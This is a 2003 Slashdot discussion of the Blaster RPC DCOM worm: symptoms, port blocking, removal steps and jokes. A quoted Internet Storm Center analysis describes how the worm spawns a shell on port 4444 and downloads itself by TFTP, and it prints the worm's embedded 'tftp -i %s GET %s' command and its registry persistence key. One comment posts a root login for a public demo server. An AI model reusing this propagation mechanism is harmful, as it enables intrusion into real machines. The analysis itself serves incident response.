RPC DCOM Worm On The Loose

GPez writes "The first of I'm sure many RPC DCOM worms affecting Windows is on its way, according to the Internet Storm Center. Patch those systems!" According to the site, "The worm uses the RPC DCOM vulnerability [affects Win2k through Server 2003] to propagate. Once it finds a vulnerable system, it will spawn a shell on port 4444 and use it to download the actual worm via tftp."

Great

[mjmalone]

The security team at my office has been scrambleing to secure all of our systems before such a worm was developed. I hope they are done!

Will blocking port 135 at the router stop this worm? Seems like a simple solution for the short term. I would like to see the source for the worm, does anybody have it?

Re:Great

[rylin]

I have a copy! You can fetch from 212.192.128.76:4444 ;)

Re:Great

[Frymaster]

in case the above gets slashdotted, the code is:

An error occured while loading http://212.192.128.76:4444:
Could not connect to host 212.192.128.76 (port 4444)

Re:Great

[Jellybob]

Well that would be because it's kept on a tftp server.

Re:Great

[dieMSdie]

Sure!

Open all your ports and I'll see what I can do!

Re:Great

[einhverfr]

Will blocking port 135 at the router stop this worm? Seems like a simple solution for the short term. I would like to see the source for the worm, does anybody have it?

It will at least slow it down, one hopes.

Also block 4444 since the worm is centrally propagating and uses that port to transmit itself.

Fortunately the virus is easy to remove. However, I don't know what its security ramifications are.

Re:Great

[ciroknight]

Yes it will work, I know from experience. My community here in berea has been pretty slammed by this worm, and I've been telling everyone to just firewall off all the ports they dont use. It seems the virus can only connect on ports 135/445 though, so still no worries here. I've been running zonealarm, a great firewall for windows users, to help solve my problem.

Re:Great

[PigeonGB]

I use GNU/Linux to solve my problem. B-)

Block TCP 4444 and TFTP = UDP 69 at Routers

[billstewart]

Blocking the various Microsoft ports will help prevent infections, but you should also block 4444 (the port the worm uses to communicate with other worms and the WormMaster) and (if it won't disrupt too much of your other activities, which it shouldn't) block tftp (which the worm uses to download attack code after getting infected.)

That's not generic advice for the DCOM bug - for that you'll need to catch whichever of the MS ports are being abused this week. But it's guesswork advice for this particular instantiation of a worm that's exploiting it so you can at least slow down this one and isolate damage, and work on patching the actual holes in Windows so that you can prevent next week's worm that uses the same bug but some other inter-worm communication path from getting in.

At least on the couple of machines I've looked at, TCP 4444 isn't used for anything (there's a UDP 4444 used for Kerberos 4-to-5 conversion or something.) TFTP gets used for things like uploading operating system versions to diskless PCs and routers, and still isn't something you should be accepting from the outside world, and for the most part (YMMV) is only used by administrators who are better off stomping worms first and upgrading routerware later. The Microsoft ports are used by all kinds of Microsoft applications - you almost certainly should be blocking them to and from the outside world, but whether to block them inside your internal nets, and where, is a decision you'll need to make based on how much of which MS network products you're actually using. (e.g. you don't want to kill all your thin-client PCs by killing off their mounts of the file servers - but you also don't want them infecting each other.)

Re:Great

[Bartmoss]

It will work until some idiotic user connetcs his company-owned notebook computer to your network - since it's unpatched, he got infected last night at home.

I have already patched my entire network.

[Znonymous Coward]

It's called a firewall. It's proteced me from Nimda, Code Red, etc.

Re:I have already patched my entire network.

[Anonymous Coward]

It's called Linux. It's protected me from Nimda, Code Red, etc...

Re:I have already patched my entire network.

[caluml]

You got the grsec patches compiled in, and a nice tight set of ACLs? Now **that** would be tight. Kind of like ssh root@selinux.dev.gentoo.org (password gentoo). You've got to be confident to let people log in to your box as root.

Re:I have already patched my entire network.

[caluml]

Selinux root isn't the same as normal root.

Oh, I know that, and you know that, but it's funny to watch people trying to install root-kits, or add new users. You want to shake them, and ask them - what are you doing - you're root already.. :)
But once they realise they can't install their IRC bots or floodping people, they get bored.
Oh, and why do people try and ftp to their own servers from that box?
grep \@ .bash_history | grep \: | grep ftp
Doh.

Re:I have already patched my entire network.

[Anonymous Coward]

I'm afraid you have a false sense of security. A firewall is only part of the solution.

A complete solution includes patching your systems and deploying IDS systems. Still, this is only part of a complete security solution.

Agreed

[ttyp0]

All our desktop computers are Windows, and simply have too many users to try and keep everyone patched. So instead, block all incoming ports on the firewall, and voila. Why this isn't standard practice is beyond me.

Anti SCO T-Shirt [anti-tshirts.com]. $1 donated to OSI Fund on each shirt.

Re:Agreed

[irc.goatse.cx troll]

Thats all fun and good until you factor in user stupidity.

I send you this file to have your advice.

Re:I have already patched my entire network.

[bigjocker]

I used this patch [mandrakelinux.com] instead in my whole network.

Re:I have already patched my entire network.

[TheGreenLantern]

While I'm sure this is technically true, some of us are responsible for networks that are slightly more complicated than an XBox, an HP Pavilion downloading porn and bootlegs 24-7, and an old P2 running Suse in our parents basement.

Re:I have already patched my entire network.

[Elwood P Dowd]

Firewalls are great. Virus scanning on email is important too. That still hasn't stopped our users from going to their personal webmail, downloading an attachment, unzipping it, running it, clicking "yes" to install it, and hitting 14 other machines with wormy goodness.

Sure, we never got Code Red. Morons are just as effective.

Re:I have already patched my entire network.

[Zathrus]

One of my coworkers thought that as well.

He was monkeying around on his RH8 box, was having network issues and setup the box as DMZ on the firewall. Later he rebooted to Win2k (on the same system, setup for the same IP). His entire network got hit with Slammer because of this. It took him the better part of a week to fix all of his boxes afterwards.

As others have said, a firewall is only part of the solution. Shutting down non-essential services/daemons, keeping up to date on patches, and in general knowi

Re:I have already patched my entire network.

[SCHecklerX]

Yup, that firewall is going to do all kinds of good when a sales droid connects their (company owned) laptop to your private network after having had it connected to the raw Internet via dialup or broadband, or after they received mail from their personal ISP and, of course, ran every attachment under the sun.

Firewall != security.

Balmer

[Anonymous Coward]

Developers developers developers..

erm...

security security security... erm ...

um...

somebody get me more cocain!

Re:Balmer

[azzy]

I think you need some e with that cocain

users being hit hard

[towaz]

the call centre here is off the scale with people ringing in with rpc problems...
all xp users though

Re:users being hit hard

[Sorthum]

Are the calls mostly centered around actual problems, or is it users doing their famous "I heard about the RPC bug, and now my computer won't boot!" routine? When Code Red came out, for instance, we saw everything from bad disks to dialup issues being blamed on it, solely because people didn't listen to anything past "the world is calling" chicken-littleisms.

Re:users being hit hard

[TheQuantumShift]

The silly thing is that most people called back when it was announced, (thanks evening news doomsayers...), with the fear of the "hackers" all through them. Now they're acting miffed when I say "a security issue that was announced on july, has not been patched on your system"... some guy even angrily took down the long distance # for ms support, because his pirate xp wouldn't auto update...

Re:users being hit hard

[Keeper]

I think it's pretty irresponsible of them not to allow the autoupdate really...

That's like stealing a car, bring it back to the car dealership to get a warantee issue fixed, and then acting all miffed when they call the cops on you.

If you steal something, don't expect the company you stole from to treat you like a customer.

Re:users being hit hard

[TheRealFixer]

Yeah, except the stolen car doesn't take off by itself in the middle of the night and start hitting every other car it sees.

Re:users being hit hard

[E-Rock]

Well, then I guess you need to step in the ol' time machine and patch, patch, patch, patch, patch. ;)

I found that the msblast.exe has a mechanism to restore itself if removed from the registry. Have to wait for the rest of the analysis before you can even start to clean up the machines.
(which you may want to mention to management is a hell of a lot more time consuming and expensive than patching would have been)

Credit...

[chill]

At least Microsoft was nice enough to credit LSD in the tech note.

Re:Credit...

[Dom2]

Once again proving that they are doing little more than deriving from Unix:

There are two major products that come out of Berkeley: LSD and UNIX. We don't believe this to be a coincidence.
-- Jeremy S. Anderson

From your local neighbourhood fortune cookie file.

-Dom

Re:Credit...

[jandrese]

You know, that joke is even funnier when it's told correctly:

There are two major products that come out of Berkeley: LSD and BSD. We don't believe this to be a coincidence.

-- Jeremy S. Anderson

Re:Credit...

[GnomeKing]

At least Microsoft was nice enough to credit LSD in the tech note.

Is that what they were taking when they wrote the code?

this vunerability...

[garcia]

if you use this vunerability against someone (usually people that hit your web server with /default.ida) you get access to a C:\ prompt. You can look around, run format, etc.

It's quick to crash the machine (apparently) as the remote becomes unusable (pingable though).

It's actually pretty nasty from what I have seen... I just wonder how effective the worm will be when the machine becomes unresponsive after a few commands?

Perhaps it won't spread as fast as others because of this problem? I suppose we can hope.

Re:this vunerability...

[Quasar1999]

No problem, I'm sure someone will fix that minor flaw, and cause it to propogate using just one command...

New title suggestion for this story

[Kappelmeister]

Developers: RPC DCOM Worm On The Loose

Shouldn't that be:

Developers, Developers, Developers, Developers, Developers, Developers, Developers, Developers, DEVELOPERS!, DEVELOPERS!, DEVELOPERS!, DEVELOPERS!, DEVELOPERS!: RPC DCOM Worm On The Loose

Wow, my 1st /.ing

[LinuxHam]

I was *just* surfing D-Shield [dshield.org] and was reading a notice about a captured worm. Sure enough, as soon as this article appeared.. the site is DOWN.. that really is something to see, even I get shocked every now and again.

Security Advisory

[Blangopolis]

The security advisory can be found here [secunia.com].

After reading the advisory, it looks like this one is going to be a bad one. I'm no expert, but I would guess that this thing is going to be around as long as code red was (and I'm still getting code red hits in my logs!)

Effects

[Papa Legba]

This worm is bugged it seems. From XP systems I have seen it throws an error to the screen about RPC services and reboots the system. On Windows 2000 Pro it crashes the svchost and a lot of stuff stops working. Just and FYI for those trying to diagnose systems right this minute.

Cagliostro

Re:Effects

[PolyDwarf]

Diagnose their systems this very minute? Screw the systems, there's /. to read!!

Re:Effects

[gclef]

The worm isn't buggy...Windows is. (well, they both have issues, but your machine going down isn't necessarily the worm coder's fault.)

Apparently there are two problems with RPC: one is a DCOM overflow, which this worm is exploiting...the other is a DoS, which shuts RPC down. Once RPC goes down, Windows wants to reboot. Microsoft has not yet offered a patch for the DoS yet, which means this worm is going to suck.

Re:Effects

[gclef]

So how do you fix an infected machine?

1) Delete msblast.exe (usually found at: winnt\system32\msblast.exe)
2) delete the Registry key: "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\windows auto update" . That key should contain the "msblast.exe" process, and is what starts it up again on reboot.
3) Patch DCOM, or you'll just get this again.

UNC-Chapel Hill South Campus Hit Hard

[Anonymous Coward]

UNC-Chapel Hill South Campus [Medicine, Pharmacy, Nursing, etc] has been slammed by this thing.

The tragic part is that Microsoft posted the patch almost a month ago:

http://www.microsoft.com/technet/treeview/default. asp?url=/technet/security/bulletin/ms03-026.asp [microsoft.com]

I saw it happen LIVE!

[__aaklbk2114]

I was working on my parents compter (Windows XP) remotely today when this started happening. I was installing some new software for them and I had also just disabled that stupid Messenger service so they would stop getting those pop-up spam messages.

Anyhow, I had just finished that when XP said it was shutting down in 30 seconds. I was like, WTF!

Here I am thinking that I just screwed up their machine with the new apps somehow.

Thanks a bunch, Billy. Guess they'll be punting this one to Longhorn :)

Virus Worm Out

[Anonymous Coward]

Hello everyone ..

I work for a small ISP ... Seems a worm has been released. We have received a number of calls about peoples systems shutting down with the following error: NT Authority System .. ect ect.

And the computer restarts.. This happens about every 40-60 Seconds making it "almost" impossible to Patch the Computer. Just a heads up for ANY IT Guys out there :)

How to patch

[einhverfr]

Enable Internet Connection Firewall, apply patch, remove virus :-)

The first is necessary because it is the buffer overrun which reboots the computer.

Increase in TCP 135 Activity

[Anonymous Coward]

This is our number of dropped TCP 135 requests at our border since noon today, per 30 mins, seen on our 2 Class Bs:

57,003 1200 to 1230
75,317 1230
59,321 1300
52,642 1330
130,932 1400
202,996 1430
277,183 1500
247,682 1530
320,919 1600
361,504 1630 to 1700

milspec

Re:Increase in TCP 135 Activity

[molarmass192]

We're seeing a steady upward trend in 135 reqs too. Much worse from our backup ISP than our primary. We've got our firewalls flicking these off at the doorstep but then again they were never allowed in in the first place.

go ME!

[StevenHallman76]

Affected Software:

* Microsoft Windows NT(R) 4.0
* Microsoft Windows NT 4.0 Terminal Services Edition
* Microsoft Windows 2000
* Microsoft Windows XP
* Microsoft Windows Server(TM) 2003

Not Affected Software:

* Microsoft Windows Millennium Edition


finally! all these years of running Win ME have paid off! so long suckers!

Re:go ME!

[Sneftel]

I'm afraid you stopped reading too soon. Here's the bit you missed:

Sucks big fat sweaty donkey balls:

* Microsoft Windows Millennium Edition

OMG

[stephenry]

OMG! It's not a worm, ITS SKYNET! It's taking over! Make your time, judgement day is nigh!

Re:OMG

[bytesmythe]

Make your time? You have no chance to survive!

Protection from the virus

[Anonymous Coward]

I've been digging around the web, and I can't seem to find out how to protect myself. I can't seem to find anything that prevents this virus from attacking my linux or as/400 servers. Help!

Erkk

[Anonymous Coward]

Got hit by this earlier today, I'm not normally a slouch with these things but this one really hit me hard, took me 4 restarts to find out what was going on. (As every time I connected to the net I was immediatly given 60 seconds before another auto restart) I can see how non-techies are gonna be totally screwed by this.

All I can say is change the properties of your RPC service repair functions. Start -> Administrative Tools -> Component Services -> Services (local). this will at least give you time to go online and download the MS patch, which we should have done weeks ago I know :)

Not quite safe:

[Telastyn]

http://www.kb.cert.org/vuls/id/326746

win2k machines are still vulnerable to a dos; even patched.

Thanks microsoft...

Helpdesk is worried...

[Kismet]

My JBoss server was listening on port 4444, so I got a call from the IS guys who thought my PC was compromised.

Firewalls *may* not protect you here

[venom600]

Everybody keeps posting that they have this or that port blocked on their firewall, so they're safe. Not so. All it takes is one person inside your network to open the wrong file attachment, or one laptop that went outside the network and then came back in to infect your internal network.

I'm safe

[teamhasnoi]

I've rolled a saving throw against remote infection and I have +3 Fireproof armor, however I am still vulnerable to hot wood elves.

You did say this was a RPG worm, right?

Windows XP Symptoms

[Titanium Angel]

It looks like the worm affects svchost.exe (the Generic Host Process), and keeps restarting the computer. At first I thought that some of my hardware was failing, but after reading dozens of posts on Usenet about similar problems, I wasn't really sure. So I researched a bit on Google, and found the MS security bulletin. After patching my system, the problems seem to have gone. I guess I should have followed more closely Microsoft's security announcements.

So, if you have strange issues with the RPC, or are

So why did it *ever* listen to 445 by default?

[Tackhead]

> It looks like the worm affects svchost.exe (the Generic Host Process),

"Uh, WTF is SVCHOST.EXE, and why the fuck does it always bind itself to 445, and how can I make it stop doing that? I don't know what it's listening for, but I know that for what I'm using this box for, I don't need it, so why can't I disable the offending process?"
- Me, the first time I played with a W2K box.

"So SVCHOST does too much stuff to just kill it, but how can I at least stop it from binding to 445? I know I'm not

SP3?

[poptones]

Are there really that many win2k systems not even running SP3? That's not the only fix, but I have a box here that has had zero patches except SP3 and DCOM is disabled by default - which pretty much makes this "buffer overflow" a non issue. Doesn't XP also install (by default) DCOM disabled? So where is all this traffic coming from? People too nervous to install SP3? People too stubborn to stop using NT4?

pay attention, son...

[poptones]

Win2K pre-SP3:

spam popups every day; port 135 wide open, DCOM blazing away

Post-SP3:

no popups; port 135 still wide open, but not much there because DCOM is now DISABLED.

Like I said: it's just a "junk box" I setup the other day because the power supply died in my "good" server box. I haven't installed the googleplex of win2k patches because I don't think it's worth it - I'm only using it temporarily and if it gets hit I'll reinstall the OS (or stick a freesco floppy in the drive and reboot). This is just

WINE?

[Anonymous Coward]

Does anyone know if WINE supports this worm yet? I would like to test it out but I don't have Windows on my desktop.

Thanks.

Where was this story 3 hours ago?

[Speed Racer]

A friend of mine called me about 3 hours ago saying that her brand new Windows XP notebook kept rebooting with some strange message about RPC. I had her download the free version of ZoneAlarm [zonelabs.com] and that blocked the worm and let her stay online long enough to download the patch. If you know somebody that's getting hammered, have them give ZoneAlarm a shot.

More diagnoses info

[Papa Legba]

On XP you are getting two error codes.
The first is a system shutdown window tellign you that the RPC service must be restarted,. This gives you 30 seconds before reboot. Iniated by NT Authority\system. This is a succesful XP infection

The other is Windows cannot open this file:

File: TFTp784

This appears to be an unsuccesful try.

For windows 2000 it crashes svchost trying to get in it appears. Just apply the patch to stop the crashes. It does not appear to get into the system in this case

Hope this helps everyone

Cagliostro

Slashdot saves my girlfriend!

[brandonY]

My girlfriend called me not 20 minutes before this article went up asking what RPC was and why it was shutting her computer down whenever she got on the Internet. A quick glance at this article's headline followed by a thorough read of symmantec's removal instructions led to me calling her back and another day saved! Thanks, Slashdot! Thanks, Symmantec Security Response Team!

freedce - DCE RPC for Linux

[hey]

Sure there's a bug now. But Microsoft picking DCE RPC for DCOM was a nice thing for the open source community since its a documented protocol. There's a project supporting it on Linux: freedce [sourceforge.net]. I have used freedce to communicate between Linux and Windows. It's nice.

I was *nailed* by this thing over the weekend

[drgroove]

At first, I couldn't figure out why Task Manager suddenly stopped working. Launching TaskMan.exe resulted in an error message "Task Manager has been disabled by the Administrator".

Odd, I thought. I *am* the administrator.

I realized I had been hit by a virus or worm when I rebooted and the autoexec.bat file opened up during my login. Not good.

Norton didn't pick up on this one at all; furthermore, McAfee's online virus/worm searching tool found a related virus, but not the actual baddie.

The virus that McAfee located - which probably came in after the worm opened up all those ports in my firewall - were in \WINNT\msagent\intl. Basically, anything in that directory that *isn't* a .dll file, delete them.

The worm itself is in \WINNT\system32\, and is called 'msconfig[nn].exe', where [nn] is interchangeable with two numbers. Mine was 'msconfig35.exe', I've read reports on various forums of others w/ '32' and '33' after the 'msconfig'.

Be careful here, as this app will spawn identical, hidden copies of itself with random names (like 'dwigjenjig.exe' or 'zajdfanltef.exe'). The easiest way I found to discern between real MS files and the worm was by looking at the last modified date displayed by Explorer, vs the last modified date that pops up when you mouse over the file name. All of the worm files had discrepancies between the two.

Hope that helps someone out there!

Notepad: kills bugs dead

[Spy Hunter]

Actually, that's a different worm. I should know, I've been infected by both of these in the last week :-) I've been running an unpatched XP install on my desktop. I don't have any antivirus software installed (the only really successful worms are the ones that aren't stopped by antivirus software, what's the point?) so I have to defeat viruses myself in open combat ;-)

Anyway, the one thing I found that killed them both is Notepad. Just open up the executable in Notepad, type a few random characters here and there, erase some things, mess up the file header, and then save right over the virus! They're never expecting that. Make sure to kill the virus processes first, of course, or else you'll get the infamous "access violation". (In the case of msconfig32.exe, you must use the command-line tools 'tasklist' and 'taskkill') The viruses might restore themselves if you remove them from the registry, or delete the file, but they're not expecting you to corrupt the executable. If Windows, in its infinite stupidity, tries to run the virus again, it will fail harmlessly.

P.S. I know, I know, you're wondering why I'm running an unpatched XP install on my desktop. Well, I just reinstalled, and only have dialup, and I'm going back to college in a month where there's super-broadband. Downloading 30+ MB (conservative estimate) of service packs, patches, hotfixes, and updates over dialup (not even 56k, more like 28.8) seems pointless. Besides, it's interesting seeing actual virus infections happen and fixing them myself. If anything goes horribly wrong, I have my XP cd right here to reinstall again. I'll be reinstalling and patching when I get back to a real internet connection.

Stanford and Cal hit hard by RPC exploit!

[Anonymous Coward]

Stanford has been hit pretty hard [stanford.edu] by this. 2,400 of their 20,000 machines compromised!

And Cal(Berkeley) is blocking their network from outside access [theargusonline.com] starting today for four days. Makes me wonder how many other large networks have been compromised, but don't know it.

I'm glad I don't work at Stanford.....don't envy them having to wipe 2,400 machines and sort through files that need to be replaced.....trying to avoid trojans, etc

The fun begins...

[PhoenixFlare]

~50 hits on my router in just the last half-hour or so, 90% of them from Rochester and NYC RoadRunner addresses.

I have a feeling this worm will hit especially hard on home broadband users that never touch Windows Update.

Re:The fun begins...

[k-hell]

Yep, you got that one right. I just helped a friend of mine here in Boston getting rid of the worm. He's on AT&T broadband and hasn't been using Windows Update in a couple of months.

He called me because he got this "strange error message" when he logged in, saying that there was "something wrong" with RPC, and that he had 1 minute to save his files before the machine rebooted. I thought "riiight, RPC.. I guess we need to check your running processes and your registry here..". And of course, msblast.exe

Quick-Fix

[Chaymus]

So i load up my /. as my homepage, take a look at the first headline, RP-What? Read up a bit, go: "Huh, that's interesting" and head off to my email site. Bam! i get pegged with this worm and my computer shuts down. For anyone else in the same boat as me, you can still download the patch using the infected computer by typing: services.msc there will be two services listed that are directly linked to this worm under the Remote Procedure Call heading, just look threw the list in the standard tab. You can by pass it by going into teh properties and changing the crash executions do "Do nothing" instead of restarting your computer. I was able to download the patch via the website and am now looking for a way to rid myself of this worm. Firewalls eh? I've heard of them, but then what else am I going to do in my spare time?

Egress Filtering

[ThatDamnMurphyGuy]

I've said it before, and I'll say it again.

While there is no excuse for not updating your systems, some people can't do so because of business policy reasons (non-tested patches against business critical systems).

EVERYONE with a server on the internet should also have Egress filtering in place. 486 mahcines are cheap. Unix/Linux firewalls are free. On the off chance you do get the M$ IS$ Worm of the week, at least your server can't initiate an outgoing connection to download more code and move on to the next system.

Re:Egress Filtering

[ThatDamnMurphyGuy]

Then again, why on earth expose these to the internet? (135, 139, or 445). Or course, internal virii catching employees are just as dangerous to your servers as the external bad guys.

Yawn....

[dfn5]

They did this already last week on Stargate SG1 with that virus that spread from gate to gate and took down the whole network in 2+ hours. Can't these virus writers ever come up with something original?

ISC Advisory

[Dynamoo]

Internet Storm Center is getting hammered, so I attach their analysis.

NOTE: the scanning is being done Code Red style, so it is concentrating on the class B pseudo-subnet, e.g. 123.123.x.x. If this gets inside your corporate firewall then you are screwed.

I count about 1 scan every 10 seconds at present.

--x8 Cut here ----

This RPC DCOM worm started spreading early afternoon EDT (evening UTC). At this point, it is spreading rapidly.

**********
NOTE: PRELIMINARY. Do not base your incidents response solely on this writeup. **********

Increase in port 135 activity: http://isc.sans.org/images/port135percent.png

The worm may launch a syn flood against windowsupdate.com on the 16th. It has the ability to infect Windows 2000 and XP.

The worm uses the RPC DCOM vulnerability to propagate. One it finds a vulnerable system, it will spawn a shell on port 4444 and use it to download the actual worm via tftp. The exploit itself is very close to 'dcom.c' and so far appears to use the "universal Win2k" offset only.

Infection sequence: 1. SOURCE sends packets to port 135 tcp with variation of dcom.c exploit to TARGET
2. this causes a remote shell on port 4444 at the TARGET
3. the SOURCE now sends the tftp get command to the TARGET, using the shell on port 4444,
4. the target will now connect to the tftp server at the SOURCE.

The name of the binary is msblast.exe. It is packed with UPX and will self extract. The size of the binary is about 11kByte unpacked, and 6kBytes packed:

MD5sum packed: 5ae700c1dffb00cef492844a4db6cd69 (6176 Bytes)

So far we found the following properties:

- Scans sequentially for machines with open port 135, starting at a presumably random IP address
- uses multiple TFTP servers to pull the binary
- adds a registry key to start itself after reboot

Name of registry key:
SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n, name: 'windows auto update'

Strings of interest:

msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
windowsupdate.com
start %s
tftp -i %s GET %s
%d.%d.%d.%d
%i.%i.%i.%i
BILLY
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\ Run

Existing RPC DCOM snort signatures will detect this worm. The worm is based on dcom.c

Our Fix for out Cable ISP

[ironicsky]

Step 1. Shut down PC
Step 2. Unplug Cable Modem.
Step 3. Start up PC
Step 4. Click Start -> Settings -> Control Panel
Step 5. Double Click Network Connections
Step 6. Right Click the Local Area Connection used to access Internet. Example: Local Area Connection 1
Step 7. Select Properties
Step 8. Click the Advanced Tab
Step 9. Enable the Windows XP Firewall
Step 10. Click OK, Close out of open windows.
Step 11. Plug in the Cable Modem.
Step 12. Ensure Block Sync is established.
Step 13. Open Internet Explorer
Step 14. Go to the following URL: http://www.microsoft.com/technet/default.asp
Step 15. Click the Link toward the middle of the page titled: Action: Read Security Bulletin MS03-026 and Install the Security Patch Immediately
Step 16. Scroll Down Page about half way to Patch Availability
Step 17. Click Windows XP 32 bit Edition
Step 18. Click Download in the upper right of the screen.
Step 19. Save the file to the desktop
Step 20. Run the downloaded file.
Step 21. The patch will install and prompt the customer to reboot.
Step 22. Once the patch is installed and the computer rebooted, the Windows XP firewall can be disabled

Bug/Feature??

[RonnyJ]

A lot of people seem to think the executable is bugged, crashing the RPC service and causing Windows to shutdown. Seems like a good payload to me. In my example, my computer shut down within a few minutes. This makes it exceedingly hard for people to find information and download a patch to fix it, yet at the same time, the trojan is scanning and infecting others while you're trying to fix it. I was struggling to download the patch on modem, took about 5 shutdowns until I had it. Also, at this moment, the main cable provider in the UK seems swamped with this problem, and I don't think it'll go away fast.

I always love these attacks

[pclminion]

My /var/log/iptables_input_reject.log file is now a list of exploitable hosts ;-)

I'm only KIDDING, jeez!

Catch-22 cleanup

[mosschops]

This worm seems particularly nasty because it prevents you getting online long enough to download the patch. If you go online you're likely to get hit again, and the reboots continue.

Here's a work-around I've been talking some of my relatived through tonight. It's not something I'd normally want to expose them to, but it certainly saves me a visit to do it myself!

If you're on a LAN, disconnect the machine from the network before you boot up, to prevent other infected machines from rebooting you again.

Right-click on My Computer, select Manage, then under the Services and Applications branch pick Services.

Right-click on Remote Procedure Call (RPC) in the list on the right, and select Properties. On the Recovery tab, change the 3 combo boxes from "Restart the computer" to "Take no action". Click OK to close the dialog.

You're still vulnerable but your machine won't reboot, giving you time to go online and get the patch. Reconnect your network cable, or establish your normal dial-up connection.

Go to http://support.microsoft.com/?kbid=823980 to grab the patch for your machine. As soon as you've got it, disconnect your network connection/cable, and run the patch. BUT don't reboot when prompted!

Open RegEdit and browse to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and delete the "windows auto update" value, which starts the worm when Windows starts. Now restart Windows and you should be free of the worm.

To finish the cleaning process, delete C:\WINDOWS\SYSTEM32\MSBLAST.EXE

DSL Users beware...

[Lodragandraoidh]

Just bought my wife a new XP machine - because she has been having issues with the crappy linux boxes I have given her [300mhz should be fast enough for anyone...](all of my machines are Linux - daughter has an old win98 and a linux box on kvm).

She complained that her computer was shutting down all day - get this, I don't have any ports enabled on my router - its closed tighter than duck's ass.

So, I'm sitting there, and she decides to turn her machine back on - a few minutes later....BAM...my whole DSL network goes down.

So, not making the cause and effect connection, I call my local phone company. They are able to ping my DSL modem. So they go through the motions, and get me to hook up my XP machine to the network directly through the DSL modem...friggin' brilliant. I hook it up, and ...BAM! again... This time its an 'RPC' call error - 'shutting system down' message. Crap. I shut the system down and pull it completely off the network.

I then check my linksys router - everything on it is reset to the defaults...everything. No ppoe settings, no password [its set to the default] - nada, nothing, zip.

I reset everything, and up comes my network - thats when I browse on over to /. and see this post about the worm. I do a little forensics and find the c:\winnt\system32\msblast.exe, and c:\winnt\system32\pre[a-Z*]\msblast.exe.23oiu4i734 - I assume the pftp scratch file. Son-of-a-bitch.

I also look for the registry entry to restart the worm - but don't find it (so far, so good). I delete the scratch file ok, but the msblast.exe file will not delete (the system says the wheel user isn't authorized - what kind of Mickey-Mouse operating system is this!!?)

I want to know:
1. how to clean this up?
2. how the hell did this thing ZAP my Linksys with all the ports disabled?
3. where the hell can I get my $99 back for this bogus operating system?

Re: To Delete msblast: 1st End Process "msblast"

[CFrankBernard]

To delete the msblast file, you may have to first open Task Manager, click the Processes tab, highlight the "msblast" process and hit the "End Process" button...then try to delete the file.

I'm not sure about removing it....

[TheBoostedBrain]

Trend Micro says [trendmicro.com] that this worm performs a DDoS to Windows Update Site, I'm not really sure about removing it...

W32.Blaster.Worm Removal Tool

[SailorBob]

Here's the homepage [symantec.com] for Symantec's tool which removes this worm.

Re:Port 4444

[venom600]

Both. It is opening a shell on port 4444 and contacting a tftp server (using the shell) to download a file which is the worm code itself.

Re:Port 4444

[Anonymous Coward]

Shell is on 4444. TFTP is on standard port. Random scanner? SHA-1 of packed worm is BED8E439F28A1A0D3876366CBD76A43CDCCF60FA. It'll lookup windowsupdate.com and flood on the 16th. Filename is msblast.exe, length 6176 bytes. Partial string "to say LOVE YOU SAN!!" appears even in the packed version (UPX 1.22). More detailed stuff to follow...

Confirmed some details

[RobertB-DC]

Just FYI, I've confirmed on my system that at least some of the parent's information is true. I got hit around 2pm Dallas time, and I've now got a file called msblast.exe in c:\winnt\system32 with a file length of 6176 bytes.

After the "to say LOVE YOU SAN!!" string, I find these words: bill gates you make hi possi. And before it, it looks like it says "I ju wan to say" (with control characters that may or may not be of interest).

Sure enough, Symantec [symantec.com] has some info now, too (just sent by someone in my co

Re:Worse

[caluml]

And they don't block access to Slashdot? But it's full of Linux propoganda!

Re:Worse

[einhverfr]

And they don't block access to Slashdot? But it's full of Linux propoganda!

No, but slashdot sometimes blocks us because some corporate loser does something stupid. Then I have to change which proxy I use....

Andyway, due to the virus, I am really glad I am not working today, but I have had to send the msblast.exe to our virus reporting team, etc.

Re:This is just sick.

[red floyd]

They *DID* put it on Windows Update. On 16 July.

Re:This is just sick.

[The Bungi]

That fix has been there for almost a month. So... shut up, please. There's nothing worse than going off on a "OMG, M$ suxx is teh gahyest!!1!!" rant when you're just plain wrong.

Re:On the way?

[Sethb]

If any Windows shops actually get hit hard by this, the Sysadmins need to be reprimanded or fired. My Co-Worker and I manage about 375 PCs at a University which has no firewall, though the NetBIOS ports are blocked at the border router.

You should have had auto-updates turned on for your boxes and/or been using SUS server to push these kind of updates out. We had autoupdates on, and then when the free scanner tool from eeye.com came out last week, we used that to scan the rest of our machines to identify any that didn't get the patch yet (not everyone has bene migrated into our domain yet, and there are some rogue NT 4 boxes around still).

As a result, we had everything reasonbly secure last Monday, and AFAIK there are no vulnerable machines on any of our subnets, according to my scans.

So, uh, what were you other Windows admins doing when you should have been doing your job?

Re:On the way?

[caluml]

I don't think this is a troll. It's a valid comment. The moderator that modded this troll is probably a Windows admin who's just realised that s/he's been infected.

Re:On the way?

[jafiwam]

While it is true that people should be patched; this worm can still damage stuff on patched servers.

If the server is not firewalled, but it is patched, the msbash.exe worm probing can crash the RPC service. Which then crashes Exchange, Some AD stuff, some windows explorer stuff, and other things (including windows update). It can still bring the DMZ servers to their knees EVEN IF THEY ARE PATCHED.

You are only fully protected if you are both patched AND the 135/445 ports are shut off from the internet. (No naked DMZ stuff.)

I personally patched all the DMZ servers with the hotfix the day it came out, then some other servers with SP4 that included the exploit fix Only the SP4 ones are unaffected.

Note, I am talking about services available, none of the boxes in question actually got infected. The infection attempt caused the problem.

Naked un-firewalled computers are going to get this thing, and get it bad.

It will be interesting to see if that August 16th date pans out to be a dDOS or what...

[Note, auto update is fine for PCs, but is fucking dangerous for production servers. Sometimes the updates do not play nice with whatever is there, if it happens when so-and-so is on vacation there could be real trouble. Do what you gotta do, but I am never going to let MS put anything on my stuff. You'll probably see when someone figures out how to spoof that and gets all 375 of your boxes rooted due to Windows Update.]

Windoze Auto update doesn't necessarily work!

[Anonymous Coward]

I feel sorry for anyone depending on Windoze Update. Like many M$ products it's broken, at least part of the time. I'm pasting below a couple of posts from NT BugTraq and Full-Disclosure last month discussing this:
-----------------
Message: 16
Date: Wed, 30 Jul 2003 17:09:14 -0500
From: "Schmehl, Paul L" (email address removed)
To:
Subject: [Full-Disclosure] Patching networks redux

For all those experts who have mastered patching your networks, please ignore this post.

For the rest of you, testing has shown t

Re:On the way?

[Loki_1929]

